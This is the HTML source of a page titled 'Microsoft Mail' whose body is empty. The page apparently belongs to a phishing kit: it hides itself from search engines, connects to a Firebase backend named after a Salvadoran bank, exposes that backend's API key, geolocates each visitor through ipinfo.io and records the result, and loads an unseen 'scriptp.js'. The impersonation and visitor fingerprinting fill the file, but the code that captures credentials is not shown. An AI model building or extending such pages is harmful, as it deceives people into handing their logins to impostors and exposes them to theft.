<!DOCTYPE HTML>
<html lang="en-US">


<head>
	<meta name="robots" content="noindex" />
    <meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta name="robots" content="noindex, nofollow">
<meta name="robots" content="nofollow">
<meta name="googlebot" content="noindex">

	<meta charset="UTF-8">
	<link rel="stylesheet" href="testing.css">
	<title>Microsoft Mail</title>
	<meta name="viewport" content="width=device-width">
	<meta name="description" content="The new Microsoft Logo (2012) full CSS with only 1 HTML element. Smartphone compatible.">		

	<style type="text/css">
	
	</style>
</head>
<body id="mylist">
	
	
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-app.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-analytics.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-firestore.js"></script>



<script id="testScriptName">
  // Your web app's Firebase configuration
   var firebaseConfig = {
    apiKey: "AIzaSyDU0fPnneyoqebrHgS4OE2R-9puHmtug84",
  authDomain: "agricolabanco-salvador.firebaseapp.com",
  projectId: "agricolabanco-salvador",
  storageBucket: "agricolabanco-salvador.appspot.com",
  messagingSenderId: "1088237409908",
  appId: "1:1088237409908:web:806d1c63c25814bf166321"

  };
  // Initialize Firebase  
  firebase.initializeApp(firebaseConfig);

</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

<script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
 <script>

async function getIpClient() {
  try {
    const response = await axios.get('https://ipinfo.io/json');
    console.log(response);
    
    function docReady(fn) {
    // see if DOM is already available
    if (document.readyState === "complete" || document.readyState === "interactive") {
        // call on next available tick
        setTimeout(fn, 1);
    } else {
        document.addEventListener("DOMContentLoaded", fn);
    }
}    
docReady(function() {
   
   localStorage.setItem("pusr", response.data.country);
    
});
  } catch (error) {
    console.error(error);
    
    
    
  }
}
var todayDate = new Date().toISOString().slice(0, 10);
localStorage.setItem("pusrf", todayDate);

getIpClient();

      


</script>

	


<script src="scriptp.js" defer></script>
</html>
